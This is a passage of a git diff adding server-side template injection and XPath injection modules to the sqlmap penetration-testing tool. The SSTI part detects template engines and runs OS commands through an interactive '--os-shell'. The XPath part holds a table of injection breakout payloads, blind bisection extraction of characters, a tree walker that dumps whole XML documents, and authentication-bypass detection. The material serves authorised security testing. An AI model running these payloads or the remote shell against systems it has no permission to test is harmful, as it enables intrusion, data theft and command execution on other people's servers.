+ if _detectBoolean(place, parameter, engine):
+ evidence["boolean"] = True
+ score += 2
+
+ # Phase 3: Error-based fingerprinting
+ errorPage = _probeError(place, parameter, engine)
+ if errorPage is not None:
+ if _isError(errorPage, engine):
+ evidence["error"] = True
+ score += 1
+
+ # Phase 4: Distinguishing probe (breaks ties within delimiter families)
+ if _probeDistinguishing(place, parameter, engine):
+ evidence["distinguishing"] = True
+ score += 2
+
+ # Phase 5: language-family confirmation via divide-by-zero error class
+ if _probeFamily(place, parameter, engine, divZeroCache) == engine.family:
+ evidence["family"] = True
+ score += 1
+
+ if score > bestScore:
+ bestScore = score
+ bestEngine = engine
+ bestEvidence = evidence
+
+ if bestEngine and bestScore >= 3:
+ # For engines with ambiguous delimiters (shared by multiple engines),
+ # name a specific engine when: error fingerprint, distinguishing probe,
+ # or boolean rendering is unique within the delimiter family.
+ _FAMILY = {
+ "{{": "Jinja2/Twig/Handlebars-like",
+ "${": "Freemarker/SpringEL/Mako-like",
+ }
+ if bestEngine.delimiter in _FAMILY:
+ if (bestEvidence.get("error") or
+ bestEvidence.get("distinguishing") or
+ (bestEvidence.get("boolean") and _booleanUniquelyIdentifies(bestEngine)) or
+ (bestEvidence.get("family") and _familyUniquelyIdentifies(bestEngine))):
+ pass # specific engine name stands
+ else:
+ bestEngine = bestEngine._replace(
+ name="%s (probable %s)" % (_FAMILY[bestEngine.delimiter], bestEngine.name))
+ return bestEngine, bestEvidence
+
+ # Fallback: generic error detection
+ errorBackend = None
+ for suffix in ("{{", "${", "<%=", "#{"):
+ page = _send(place, parameter, _originalValue(place, parameter) + suffix)
+ if page:
+ backend = _backendFromError(page)
+ if backend:
+ errorBackend = backend
+ break
+
+ if errorBackend:
+ for engine in _ENGINE_TABLE:
+ if engine.name.lower() in errorBackend.lower():
+ return engine, {"error": True}
+
+ return None, None
+
+
+def sstiScan():
+ global SENTINEL
+ SENTINEL = randomStr(length=10, lowercase=True)
+
+ debugMsg = "'--ssti' is self-contained: it detects SSTI and fingerprints "
+ debugMsg += "common template engines when possible. SQL enumeration "
+ debugMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
+ logger.debug(debugMsg)
+
+ if not conf.paramDict:
+ logger.error("no request parameters to test (use --data, GET params, or similar)")
+ return
+
+ tested = 0
+ found = []
+
+ for place in (_ for _ in SSTI_PLACES if _ in conf.paramDict):
+ for parameter in list(conf.paramDict[place].keys()):
+ if conf.testParameter and parameter not in conf.testParameter:
+ continue
+
+ tested += 1
+ logger.info("testing SSTI on %s parameter '%s'" % (place, parameter))
+
+ engine, evidence = _fingerprint(place, parameter)
+ if engine:
+ found.append((place, parameter, engine, evidence))
+ logger.info("%s parameter '%s' is vulnerable to SSTI (back-end: '%s')" % (place, parameter, engine.name))
+ if conf.beep:
+ beep()
+
+ if engine.arithmeticFmt:
+ payload = _originalValue(place, parameter) + _arithmeticPayload(engine.arithmeticFmt, 7, 7)
+ else:
+ payload = _originalValue(place, parameter) + engine.booleanTrue
+ title = "SSTI %s injection" % engine.name
+ report = "---\nParameter: %s (%s)\n Type: SSTI\n Title: %s\n Payload: %s=%s\n---" % (parameter, place, title, parameter, payload)
+ conf.dumper.singleString(report)
+
+ if evidence.get("arithmetic"):
+ logger.info("in-band arithmetic proof confirmed (control-pair)")
+ if evidence.get("boolean"):
+ logger.info("boolean oracle confirmed")
+
+ if not found:
+ if tested:
+ warnMsg = "no parameter appears to be injectable via SSTI (%d tested)" % tested
+ else:
+ warnMsg = "no parameters found to test for SSTI"
+ logger.warning(warnMsg)
+ else:
+ engines = set(engine.name for _, _, engine, _ in found)
+ if len(engines) == 1:
+ logger.info("back-end template engine: '%s'" % engines.pop())
+ else:
+ logger.info("back-end template engines: %s" % ", ".join(sorted(engines)))
+
+ if found:
+ slot = found[0]
+ place, parameter, engine, evidence = slot
+ from lib.core.common import readInput
+
+ wantsTakeover = any(conf.get(_) for _ in ("osCmd", "osShell", "sstiQuery", "sstiShell"))
+
+ # If the user did not ask for exploitation, confirm (benignly) whether OS command
+ # execution is reachable and, if so, advise the relevant switches.
+ if not wantsTakeover and _canTakeover(engine, evidence) and _probeRce(place, parameter, engine):
+ logger.info("the back-end '%s' allows OS command execution via this injection; "
+ "you are advised to try '--os-shell' (interactive) or "
+ "'--os-cmd=' (single command)" % engine.name)
+
+ # --ssti-query: user-provided expression evaluated in-band
+ if conf.get("sstiQuery"):
+ _evalExpression(place, parameter, engine, conf.sstiQuery)
+
+ # --ssti-shell: interactive expression evaluation loop (interactive even under --batch,
+ # like sqlmap's SQL --sql-shell/--os-shell, which read straight from the terminal)
+ if conf.get("sstiShell"):
+ logger.info("calling SSTI shell. Enter expressions (e.g. 7*7) or 'exit'/'quit' to leave")
+ while True:
+ expr = readInput("ssti-shell> ", checkBatch=False)
+ if not expr or expr.strip().lower() in ("exit", "quit"):
+ break
+ _evalExpression(place, parameter, engine, expr.strip())
+
+ # --os-cmd / --os-shell: RCE via SSTI (reuses existing SQL takeover flags)
+ if conf.get("osCmd") or conf.get("osShell"):
+ if not _canTakeover(engine, evidence):
+ logger.error("takeover requires exact engine fingerprint (got '%s') and "
+ "confirmed proof (arithmetic or boolean oracle)" % engine.name)
+ else:
+ if conf.get("osCmd"):
+ _executeCommand(place, parameter, engine, conf.osCmd)
+
+ # Interactive shell runs even under --batch (mirrors the SQL --os-shell, which
+ # reads commands straight from the terminal); EOF / 'exit' / 'quit' leaves it.
+ if conf.get("osShell"):
+ logger.info("calling SSTI OS shell. Enter commands or 'exit'/'quit' to leave")
+ while True:
+ cmd = readInput("os-shell> ", checkBatch=False)
+ if not cmd or cmd.strip().lower() in ("exit", "quit"):
+ break
+ _executeCommand(place, parameter, engine, cmd.strip())
+
+ logger.info("SSTI scan complete")
+
+
+def _escapeSingleQuoted(value):
+ """Escape backslashes and single quotes for embedding in a single-quoted string."""
+ return value.replace("\\", "\\\\").replace("'", "\\'")
+
+
+def _evalExpression(place, parameter, engine, expr):
+ """Wrap expr in the engine's expression format, extract result between
+ random markers for deterministic output, fall back to baseline diff."""
+
+ if not engine.expressionFmt:
+ logger.error("expression evaluation not supported for engine '%s'" % engine.name)
+ return
+
+ original = _originalValue(place, parameter) or ""
+ startMarker = randomStr(length=8, lowercase=True)
+ endMarker = randomStr(length=8, lowercase=True)
+
+ # Three-part payload: marker, expression, marker -- each in its own template tag
+ # so the expression is evaluated independently of the markers
+ payload = original + _expressionPayload(engine.expressionFmt, "'%s'" % startMarker)
+ payload += " " + _expressionPayload(engine.expressionFmt, expr)
+ payload += " " + _expressionPayload(engine.expressionFmt, "'%s'" % endMarker)
+ page = _send(place, parameter, payload)
+
+ if not page:
+ logger.warning("no response for SSTI expression '%s'" % expr)
+ return
+
+ text = getUnicode(page)
+ result = None
+
+ # Extract content between the random markers
+ if startMarker in text and endMarker in text:
+ start = text.index(startMarker) + len(startMarker)
+ end = text.index(endMarker, start)
+ result = text[start:end].strip()
+
+ # Fallback: diff against baseline
+ if not result:
+ baseline = _send(place, parameter, original)
+ if baseline:
+ sm = difflib.SequenceMatcher(None, getUnicode(baseline), text)
+ parts = []
+ for tag, i1, i2, j1, j2 in sm.get_opcodes():
+ if tag in ("insert", "replace"):
+ parts.append(text[j1:j2])
+ if parts:
+ result = "".join(parts).strip()
+
+ if result:
+ conf.dumper.singleString("SSTI expression result: %s" % result)
+ else:
+ logger.warning("could not extract expression result from response")
+
+
+def _canTakeover(engine, evidence):
+ """Require exact engine fingerprint (not a family guess) and confirmed
+ proof before attempting OS command execution."""
+ if not engine.rcePayloads:
+ return False
+ if "(probable" in engine.name or "-like" in engine.name:
+ return False
+ if not (evidence.get("arithmetic") or evidence.get("boolean")):
+ return False
+ return True
+
+
+def _probeRce(place, parameter, engine):
+ """Benign, quiet RCE-capability check: run `echo ` via the engine's RCE payloads and
+ return True if the marker is reflected (proving OS command execution is reachable). Used only
+ to advise the user; it has no side effect beyond echoing a random token."""
+
+ if not engine.rcePayloads:
+ return False
+
+ marker = randomStr(length=12, lowercase=True)
+ original = _originalValue(place, parameter) or ""
+ for payloadTemplate, _description in engine.rcePayloads:
+ payload = payloadTemplate.replace("{CMD}", "echo %s" % marker)
+ page = _send(place, parameter, original + payload)
+ if page and marker in getUnicode(page):
+ return True
+ return False
+
+
+def _executeCommand(place, parameter, engine, cmd):
+ """Execute an OS command via the engine's RCE payloads, trying each fallback
+ in order until one produces output. Captures output via baseline diff."""
+
+ safeCmd = _escapeSingleQuoted(cmd)
+ original = _originalValue(place, parameter) or ""
+ baseline = _send(place, parameter, original)
+
+ for payloadTemplate, description in engine.rcePayloads:
+ payload = payloadTemplate.replace("{CMD}", safeCmd)
+ fullPayload = original + payload
+ page = _send(place, parameter, fullPayload)
+
+ if not page:
+ continue
+
+ # Skip error pages (payload caused a template exception, not a shell)
+ if engine.errorRegex and _isError(page, engine):
+ continue
+
+ text = getUnicode(page)
+ baseText = getUnicode(baseline or "")
+ output = ""
+
+ if baseText and text != baseText:
+ sm = difflib.SequenceMatcher(None, baseText, text)
+ opcodes = sm.get_opcodes()
+ parts = []
+ for tag, i1, i2, j1, j2 in opcodes:
+ if tag in ("insert", "replace"):
+ parts.append(text[j1:j2])
+ if parts:
+ output = "".join(parts).strip()
+
+ if not output:
+ output = text
+ if original and output.startswith(original):
+ output = output[len(original):]
+ output = output.strip()
+
+ # Suppress when output is just the baseline with the original value removed
+ # (command produced no output; the template rendered empty)
+ # Filter out template error messages masquerading as command output
+ if output and _ratio(output, baseText) < UPPER_RATIO_BOUND:
+ if output != baseText.strip() and not (baseText and baseText.replace(original, "").strip() == output):
+ conf.dumper.singleString("\nos-shell (%s) [%s]:\n%s" % (cmd, description, output))
+ return
+
+ logger.warning("no output received for OS command '%s' (tried %d payload(s))" % (cmd, len(engine.rcePayloads)))
diff --git a/lib/techniques/xpath/__init__.py b/lib/techniques/xpath/__init__.py
new file mode 100644
index 0000000000..bcac841631
--- /dev/null
+++ b/lib/techniques/xpath/__init__.py
@@ -0,0 +1,8 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+"""
+
+pass
diff --git a/lib/techniques/xpath/inject.py b/lib/techniques/xpath/inject.py
new file mode 100644
index 0000000000..bd40548be9
--- /dev/null
+++ b/lib/techniques/xpath/inject.py
@@ -0,0 +1,687 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org)
+See the file 'LICENSE' for copying permission
+"""
+
+import difflib
+import re
+import time
+
+from collections import namedtuple
+
+from lib.core.common import beep
+from lib.core.common import randomStr
+from lib.core.convert import getUnicode
+from lib.core.data import conf
+from lib.core.data import logger
+from lib.core.enums import CUSTOM_LOGGING
+from lib.core.enums import PLACE
+from lib.core.settings import UPPER_RATIO_BOUND
+from lib.core.settings import XPATH_CHAR_MAX
+from lib.core.settings import XPATH_CHAR_MIN
+from lib.core.settings import XPATH_ERROR_REGEX
+from lib.core.settings import XPATH_ERROR_SIGNATURES
+from lib.core.settings import XPATH_MAX_DEPTH
+from lib.core.settings import XPATH_MAX_LENGTH
+from lib.request.connect import Connect as Request
+from lib.utils.xrange import xrange
+
+
+SENTINEL = randomStr(length=10, lowercase=True)
+
+XPATH_PLACES = (PLACE.GET, PLACE.POST, PLACE.CUSTOM_POST)
+
+# Each detection breakout is paired with a false variant and an (optional) extraction
+# boundary. The boundary carries a prefix/suffix pair that wraps the extraction
+# predicate so the surrounding template stays syntactically valid.
+#
+# Breakouts are listed in detection-priority order: function-argument closers first,
+# then simple string, double-quoted, union wildcard, and bare numeric/boolean.
+
+_BREAKOUT_TABLE = (
+ # (breakout, false_variant, extraction_prefix, extraction_suffix )
+ # -- function-argument (closes paren + string) ------------------------------------------------------------
+ ("') or true() or ('", "') and false() and ('", "') or ", " or ('"),
+ ("') or '1'='1' or ('", "') and '1'='2' and ('", "') or ", " or ('"),
+ ("') or 1=1 or ('", "') and 1=2 and ('", "') or ", " or ('"),
+ # -- single-quoted string (suffix absorbs trailing quote; predicate decisive when original value unmatched)
+ ("' or '1'='1", "' and '1'='2", "' or ", " and '1'='1"),
+ ("' or true() or '", "' and false() and '", "' or ", " and '1'='1"),
+ ("' or 1=1 or '", "' and 1=2 and '", "' or ", " and '1'='1"),
+ # -- AND context (single-quoted) -------------------------------------------------------------------------
+ ("' and '1'='1", "' and '1'='2", "' and ", " and '1'='1"),
+ # -- double-quoted string (suffix absorbs trailing quote) -------------------------------------------------
+ ('" or "1"="1', '" and "1"="2', '" or ', ' and "1"="1'),
+ ('" or true() or "', '" and false() and "', '" or ', ' and "1"="1'),
+ # -- double-quoted function-argument ---------------------------------------------------------------------
+ ('") or true() or ("', '") and false() and ("', '") or ', ' or ("'),
+ # -- union wildcard (detection-only, no extraction) ------------------------------------------------------
+ ("']|//*|test['", None, None, None),
+ # -- numeric / bare context (extraction uses 'and'; requires original value to not match anything) ----------
+ (" or 1=1", " and 1=2", " and ", ""),
+ (" or true()", " and false()", " and ", ""),
+)
+
+# Boundary: a verified injection boundary with an extraction prefix+suffix and an
+# extractable flag. Only extractable boundaries can drive tree-walking.
+Boundary = namedtuple("Boundary", ("prefix", "suffix", "extractable"))
+
+# Convenience lookups built from _BREAKOUT_TABLE
+_BREAKOUT_FALSE_MAP = {}
+_BREAKOUT_BOUNDARY = {}
+_BREAKOUT_LIST = []
+for _entry in _BREAKOUT_TABLE:
+ _bk, _fv, _pfx, _sfx = _entry
+ _BREAKOUT_LIST.append(_bk)
+ _BREAKOUT_FALSE_MAP[_bk] = _fv
+ if _pfx is not None:
+ _BREAKOUT_BOUNDARY[_bk] = Boundary(_pfx, _sfx, True)
+ else:
+ _BREAKOUT_BOUNDARY[_bk] = None
+XPATH_BREAKOUT_PREFIXES = tuple(_BREAKOUT_LIST)
+
+Slot = namedtuple("Slot", ("place", "parameter", "backend", "oracle", "template", "payload", "boundary"))
+Slot.__new__.__defaults__ = (None, None, None, None, None, None, None)
+
+
+def _ratio(first, second):
+ return difflib.SequenceMatcher(None, first or "", second or "").quick_ratio()
+
+
+def _delim(place):
+ return (conf.cookieDel or ';') if place == PLACE.COOKIE else '&'
+
+
+def _confParameters(place):
+ try:
+ return conf.parameters.get(place, "")
+ except AttributeError:
+ return conf.parameters[place] if place in conf.parameters else ""
+
+
+def _originalValue(place, parameter):
+ for segment in _confParameters(place).split(_delim(place)):
+ name, _, value = segment.partition('=')
+ if name.strip() == parameter:
+ return value
+ return conf.paramDict.get(place, {}).get(parameter) or ""
+
+
+def _replaceSegment(place, parameter, value):
+ delimiter = _delim(place)
+ raw = _confParameters(place)
+ retVal, replaced = [], False
+
+ for part in raw.split(delimiter):
+ name, _, _ = part.partition('=')
+ if not replaced and name.strip() == parameter:
+ retVal.append("%s=%s" % (name, value))
+ replaced = True
+ else:
+ retVal.append(part)
+
+ if not replaced:
+ retVal = []
+ for name, oldValue in conf.paramDict.get(place, {}).items():
+ retVal.append("%s=%s" % (name, value if name == parameter else oldValue))
+
+ return delimiter.join(retVal)
+
+
+def _send(place, parameter, value):
+ """Issue a single HTTP request with the target parameter set to `value`.
+ Temporarily mutates conf.parameters so sqlmap's normal request machinery
+ (URL construction, cookies, headers, encodings) is fully preserved."""
+
+ if conf.delay:
+ time.sleep(conf.delay)
+
+ old_params = conf.parameters.get(place, "")
+ conf.parameters[place] = _replaceSegment(place, parameter, value)
+
+ try:
+ kwargs = {"raise404": False, "silent": True}
+ if conf.verbose >= 3:
+ logger.log(CUSTOM_LOGGING.PAYLOAD, "%s=%s" % (parameter, value))
+ page, _, _ = Request.getPage(**kwargs)
+ return page or ""
+ except Exception as ex:
+ logger.debug("XPath probe request failed: %s" % getUnicode(ex))
+ return ""
+ finally:
+ conf.parameters[place] = old_params
+
+
+def _isError(page):
+ return bool(re.search(XPATH_ERROR_REGEX, getUnicode(page or "")))
+
+
+def _backendFromError(page):
+ page = getUnicode(page or "")
+ for backend, regex in XPATH_ERROR_SIGNATURES:
+ if re.search(regex, page):
+ return backend
+ return "Generic XPath" if _isError(page) else None
+
+
+def _probeBackendByParserError(place, parameter):
+ """Probe for XPath parser errors to obtain a backend hint.
+ This is NOT authoritative detection -- only a boolean oracle confirms injection."""
+
+ original = _originalValue(place, parameter) or "x"
+ normal = _send(place, parameter, original)
+
+ for suffix in ("'", '"', "')", '")', "]", "|"):
+ payload = original + suffix
+ broken = _send(place, parameter, payload)
+
+ if not normal or _ratio(normal, broken) >= UPPER_RATIO_BOUND:
+ continue
+
+ backend = _backendFromError(broken)
+ if backend and not _isError(normal):
+ return backend, payload
+
+ return None, None
+
+
+def _boolean(truthy, falsy):
+ """Return the reproducible true page when true/false probes diverge.
+ Both true AND false pages must be independently reproducible."""
+
+ truePage = truthy()
+ if truePage is None or _isError(truePage):
+ return None
+
+ truePage2 = truthy()
+ if _ratio(truePage, truePage2) < UPPER_RATIO_BOUND:
+ return None
+
+ falsePage = falsy()
+ if falsePage is None or _isError(falsePage):
+ return None
+
+ falsePage2 = falsy()
+ if _ratio(falsePage, falsePage2) < UPPER_RATIO_BOUND:
+ return None
+
+ if _ratio(truePage, falsePage) < UPPER_RATIO_BOUND:
+ return truePage
+
+ return None
+
+
+def _makePayload(original, boundary, predicate):
+ """Construct a payload by inserting `predicate` into the verified boundary."""
+ if boundary.suffix:
+ return "%s%s%s%s" % (original, boundary.prefix, predicate, boundary.suffix)
+ return "%s%s%s" % (original, boundary.prefix, predicate)
+
+
+def _detectBoolean(place, parameter):
+ """Return (template, payload, boundary) for boolean-blind XPath injection.
+ boundary is None for detection-only breakouts (wildcard, union)."""
+
+ original = _originalValue(place, parameter) or ""
+
+ for breakout in XPATH_BREAKOUT_PREFIXES:
+ truePayload = original + breakout
+ falseVariant = _BREAKOUT_FALSE_MAP.get(breakout)
+ if not falseVariant:
+ continue
+
+ falseSpecific = original + falseVariant
+ template = _boolean(lambda p=truePayload: _send(place, parameter, p),
+ lambda p=falseSpecific: _send(place, parameter, p))
+ if template:
+ boundary = _BREAKOUT_BOUNDARY.get(breakout)
+ return template, truePayload, boundary
+
+ # Wildcard: only useful for bool differentiation, not enumeration
+ if original:
+ template = _boolean(lambda: _send(place, parameter, "*"),
+ lambda: _send(place, parameter, SENTINEL))
+ if template:
+ return template, "*", None
+
+ return None, None, None
+
+
+def _isPasswordParam(parameter):
+ parameter = getUnicode(parameter or "").lower()
+ return any(_ in parameter for _ in ("pass", "pwd", "secret", "pin", "cred", "key", "token", "auth"))
+
+
+def _fingerprintByError(backend):
+ if not backend:
+ return None
+ for name, _ in XPATH_ERROR_SIGNATURES:
+ if name in backend:
+ return name
+ return backend
+
+
+def _xpathQuote(s):
+ """Quote a string for an XPath string literal, choosing the delimiter that
+ requires no escaping. When both quotes appear, use concat()."""
+
+ s = getUnicode(s)
+ if "'" not in s:
+ return "'%s'" % s
+ if '"' not in s:
+ return '"%s"' % s
+ # both quote types present: use concat() with " as outer delimiter
+ return "concat(%s)" % ", '\"', ".join('"%s"' % part for part in s.split('"'))
+
+
+class _XPathPayloadBuilder(object):
+ """Build XPath boolean predicates for blind tree-walking using the verified
+ injection boundary from detection. Each method returns a complete payload."""
+
+ def __init__(self, original, boundary):
+ self.original = original or "x"
+ self.boundary = boundary
+
+ def _make(self, predicate):
+ return _makePayload(self.original, self.boundary, predicate)
+
+ def nameStartsWith(self, path, prefix):
+ return self._make("starts-with(name(%s),%s)" % (path, _xpathQuote(prefix)))
+
+ def nameLength(self, path, length):
+ return self._make("string-length(name(%s))=%d" % (path, length))
+
+ def childCount(self, path, count):
+ return self._make("count(%s/*)>=%d" % (path, count))
+
+ def attributeCount(self, path, count):
+ return self._make("count(%s/@*)>=%d" % (path, count))
+
+ def attributeNameStartsWith(self, path, index, prefix):
+ return self._make("starts-with(name(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix)))
+
+ def attributeValueStartsWith(self, path, index, prefix):
+ return self._make("starts-with(string(%s/@*[%d]),%s)" % (path, index, _xpathQuote(prefix)))
+
+ def textStartsWith(self, path, prefix):
+ return self._make("starts-with(string(%s),%s)" % (path, _xpathQuote(prefix)))
+
+ def stringLengthAtLeast(self, target, n):
+ return self._make("string-length(%s)>=%d" % (target, n))
+
+ def charPresent(self, target, pos):
+ # True when the character at 1-based position `pos` of `target` belongs to
+ # the known ordered charset (so its index can be resolved by bisection).
+ return self._make("contains(%s,substring(%s,%d,1))" % (_CS_LITERAL, target, pos))
+
+ def charIndexAtLeast(self, target, pos, n):
+ # The 0-based index of a charset member equals the length of the charset
+ # prefix preceding it (XPath 1.0 has no lexicographic '<', but
+ # string-length(substring-before(...)) yields a number we can bisect on).
+ return self._make("string-length(substring-before(%s,substring(%s,%d,1)))>=%d" % (_CS_LITERAL, target, pos, n))
+
+
+def _makeOracle(place, parameter, template):
+ """Build an oracle from a verified true template. extract(payload) returns
+ True when the response is closer to the true template than to the false page."""
+
+ cache = {}
+
+ def request(payload):
+ if payload not in cache:
+ cache[payload] = _send(place, parameter, payload)
+ return cache[payload]
+
+ falsePage = request(SENTINEL)
+
+ def oracle(payload):
+ page = request(payload)
+ if page is None or _isError(page):
+ return False
+ return _ratio(template, page) >= UPPER_RATIO_BOUND
+
+ def extract(payload):
+ page = request(payload)
+ if page is None or _isError(page):
+ return False
+ trueRatio = _ratio(template, page)
+ falseRatio = _ratio(falsePage, page)
+ # Require either an unambiguous match against the template or a
+ # clear separation from the false page (minimum 5 %pt margin)
+ return trueRatio >= UPPER_RATIO_BOUND or (trueRatio - falseRatio) > 0.05
+
+ oracle.extract = extract
+ oracle.template = template
+ oracle.falsePage = falsePage
+ oracle.cache = cache
+ return oracle
+
+
+# Frequency-ordered charset for blind character extraction.
+# Excludes characters that are XPath metacharacters or problematic in URL context.
+_META_ORDS = set(ord(_) for _ in ("'", '"', '[', ']', '<', '>', '&', '/'))
+_FREQ = (tuple(xrange(ord('a'), ord('z') + 1)) +
+ tuple(xrange(ord('A'), ord('Z') + 1)) +
+ tuple(xrange(ord('0'), ord('9') + 1)) +
+ tuple(ord(_) for _ in "@._-+ "))
+_CHARSET = []
+for _ in _FREQ:
+ if XPATH_CHAR_MIN <= _ <= XPATH_CHAR_MAX and _ not in _META_ORDS and _ not in _CHARSET:
+ _CHARSET.append(_)
+for _ in xrange(XPATH_CHAR_MIN, XPATH_CHAR_MAX + 1):
+ if _ not in _META_ORDS and _ not in _CHARSET:
+ _CHARSET.append(_)
+
+# Codepoint-ordered charset used by the binary-search extractor. Ordering here MUST match
+# the literal string `_CS_LITERAL` so that a recovered index maps back to the right character.
+_CS_ORDS = [_ for _ in xrange(XPATH_CHAR_MIN, XPATH_CHAR_MAX + 1) if _ not in _META_ORDS]
+_CS_LITERAL = _xpathQuote("".join(chr(_) for _ in _CS_ORDS))
+
+
+def _inferValue(oracle, builder, path, getter, maxLen=XPATH_MAX_LENGTH):
+ """Blindly infer a string value at `path` using `getter(builder, path, prefix)`.
+ Returns the recovered value or None."""
+
+ value = ""
+ probes = 0
+
+ for _ in xrange(maxLen):
+ found = False
+
+ for cp in _CHARSET:
+ candidate = value + chr(cp)
+ probes += 1
+
+ if oracle.extract(getter(builder, path, candidate)):
+ value = candidate
+ found = True
+ break
+
+ if not found:
+ break
+
+ if value.endswith(" "):
+ value = value.rstrip()
+ break
+
+ logger.debug("XPath blind inference: %d probes (length=%d)" % (probes, len(value)))
+ return value if value else None
+
+
+def _inferCount(oracle, builder, path, countFn, maxCount=128):
+ """Binary search for a count value using predicate 'count(...)>=N'."""
+
+ if not oracle.extract(countFn(builder, path, 1)):
+ return 0
+
+ lo, hi = 1, maxCount
+ while lo < hi:
+ mid = (lo + hi + 1) // 2
+ if oracle.extract(countFn(builder, path, mid)):
+ lo = mid
+ else:
+ hi = mid - 1
+ return lo
+
+
+def _inferString(oracle, builder, target, maxLen=XPATH_MAX_LENGTH):
+ """Blindly recover the string value of XPath expression `target` (e.g.
+ "name(/*)" or "string(/*[1]/@*[1])") using binary search.
+
+ The length is bisected first, then each character is resolved by bisecting
+ its index inside the ordered charset. This needs ~log2(len) requests per
+ character versus the linear charset scan in _inferValue(), which matters a
+ lot when walking a whole document tree. Characters outside the charset are
+ surfaced as '?' so the rest of the value is still recovered."""
+
+ if not oracle.extract(builder.stringLengthAtLeast(target, 1)):
+ return None
+
+ lo, hi = 1, maxLen
+ while lo < hi:
+ mid = (lo + hi + 1) // 2
+ if oracle.extract(builder.stringLengthAtLeast(target, mid)):
+ lo = mid
+ else:
+ hi = mid - 1
+ length = lo
+
+ chars = []
+ probes = 0
+ last = len(_CS_ORDS) - 1
+ for pos in xrange(1, length + 1):
+ probes += 1
+ if not oracle.extract(builder.charPresent(target, pos)):
+ chars.append("?")
+ continue
+
+ clo, chi = 0, last
+ while clo < chi:
+ cmid = (clo + chi + 1) // 2
+ probes += 1
+ if oracle.extract(builder.charIndexAtLeast(target, pos, cmid)):
+ clo = cmid
+ else:
+ chi = cmid - 1
+ chars.append(chr(_CS_ORDS[clo]))
+
+ value = "".join(chars)
+ logger.debug("XPath blind inference: %d probes (length=%d)" % (probes, length))
+ return value or None
+
+
+def _walkTree(oracle, builder, path="/*", depth=0):
+ """Recursively walk the XML tree from a given XPath expression.
+ Returns a dict: {name, path, children, attributes, text} or None."""
+
+ if depth > XPATH_MAX_DEPTH:
+ return None
+
+ name = _inferString(oracle, builder, "name(%s)" % path)
+ if not name:
+ return None
+
+ logger.info("discovered element: '%s'" % name)
+
+ childCount = _inferCount(oracle, builder, path,
+ lambda b, p, c: b.childCount(p, c),
+ maxCount=32)
+
+ attrCount = _inferCount(oracle, builder, path,
+ lambda b, p, c: b.attributeCount(p, c),
+ maxCount=16)
+
+ attributes = []
+ for i in xrange(1, attrCount + 1):
+ attrName = _inferString(oracle, builder, "name(%s/@*[%d])" % (path, i))
+ if not attrName:
+ continue
+
+ attrValue = _inferString(oracle, builder, "string(%s/@*[%d])" % (path, i))
+ attributes.append({"name": attrName, "value": attrValue or ""})
+ logger.info(" attribute: @%s='%s'" % (attrName, attrValue or ""))
+
+ text = None
+ if childCount == 0:
+ text = _inferString(oracle, builder, "string(%s)" % path)
+
+ children = []
+ for i in xrange(1, childCount + 1):
+ childPath = "%s/*[%d]" % (path, i)
+ child = _walkTree(oracle, builder, childPath, depth + 1)
+ if child:
+ children.append(child)
+
+ return {
+ "name": name,
+ "path": path,
+ "children": children,
+ "attributes": attributes,
+ "text": text,
+ }
+
+
+def _treeToTable(node):
+ """Flatten a tree node to (columns, rows) for grid output."""
+
+ columns = ["Path", "Element", "Attribute", "Value"]
+ rows = []
+
+ def _flatten(n, depth=0):
+ path = n["path"]
+ rows.append([path, n["name"], "", ""])
+ for attr in n.get("attributes", []):
+ rows.append([path, n["name"], "@" + attr["name"], attr["value"]])
+ if n.get("text"):
+ rows.append([path, n["name"], "text()", n["text"]])
+ for child in n.get("children", []):
+ _flatten(child, depth + 1)
+
+ _flatten(node)
+ return columns, [_ for _ in rows if _[3] or _[2] not in ("", "text()")]
+
+
+def _grid(columns, rows):
+ columns = [getUnicode(_) for _ in columns]
+ rows = [[getUnicode(_) for _ in row] for row in rows]
+
+ widths = []
+ for index, column in enumerate(columns):
+ width = len(column)
+ for row in rows:
+ if index < len(row):
+ width = max(width, len(getUnicode(row[index])))
+ widths.append(width)
+
+ separator = "+-" + "-+-".join("-" * _ for _ in widths) + "-+"
+
+ def line(cells):
+ return "| " + " | ".join((getUnicode(cells[index]) if index < len(cells) else "").ljust(widths[index]) for index in xrange(len(columns))) + " |"
+
+ return "\n".join([separator, line(columns), separator] + [line(row) for row in rows] + [separator])
+
+
+def _dumpTable(title, columns, rows):
+ if rows:
+ conf.dumper.singleString("%s:\n%s" % (title, _grid(columns, rows)))
+
+
+def xpathScan():
+ global SENTINEL
+ SENTINEL = randomStr(length=10, lowercase=True)
+
+ debugMsg = "'--xpath' is self-contained: it detects XPath injection in HTTP "
+ debugMsg += "parameters and walks the reachable XML document tree. SQL enumeration "
+ debugMsg += "switches (--banner, --dbs, --tables, --users, --sql-query) are ignored"
+ logger.debug(debugMsg)
+
+ if not conf.paramDict:
+ logger.error("no request parameters to test (use --data, GET params, or similar)")
+ return
+
+ tested = found = 0
+ slots = []
+
+ for place in (_ for _ in XPATH_PLACES if _ in conf.paramDict):
+ for parameter in list(conf.paramDict[place].keys()):
+ if conf.testParameter and parameter not in conf.testParameter:
+ continue
+
+ tested += 1
+ logger.info("testing XPath injection on %s parameter '%s'" % (place, parameter))
+
+ # Phase 1: Probe the XPath parser for a backend hint
+ backendHint, _errorPayload = _probeBackendByParserError(place, parameter)
+ if backendHint:
+ backendHint = _fingerprintByError(backendHint)
+
+ # Phase 2: Establish a boolean oracle (authoritative)
+ template, payload, boundary = _detectBoolean(place, parameter)
+ if template:
+ if boundary and boundary.extractable:
+ found += 1
+ backend = backendHint or "Generic XPath"
+ logger.info("%s parameter '%s' is vulnerable to XPath injection (back-end: '%s')" % (place, parameter, backend))
+ if conf.beep:
+ beep()
+
+ oracle = _makeOracle(place, parameter, template)
+ slots.append(Slot(place=place, parameter=parameter, backend=backend,
+ oracle=oracle, template=template, payload=payload,
+ boundary=boundary))
+ continue
+
+ # Detection-only: boolean differentiation confirmed but no extraction boundary.
+ # Report as auth bypass on credential fields; log generically otherwise.
+ found += 1
+ if _isPasswordParam(parameter):
+ title = "XPath auth bypass"
+ logger.info("%s parameter '%s' allows XPath auth bypass (boolean differentiation confirmed)" % (place, parameter))
+ else:
+ title = "XPath boolean-based blind (detection-only)"
+ logger.info("%s parameter '%s' is vulnerable to XPath injection (detection-only, back-end: '%s')" % (place, parameter, backendHint or "Generic XPath"))
+ if conf.beep:
+ beep()
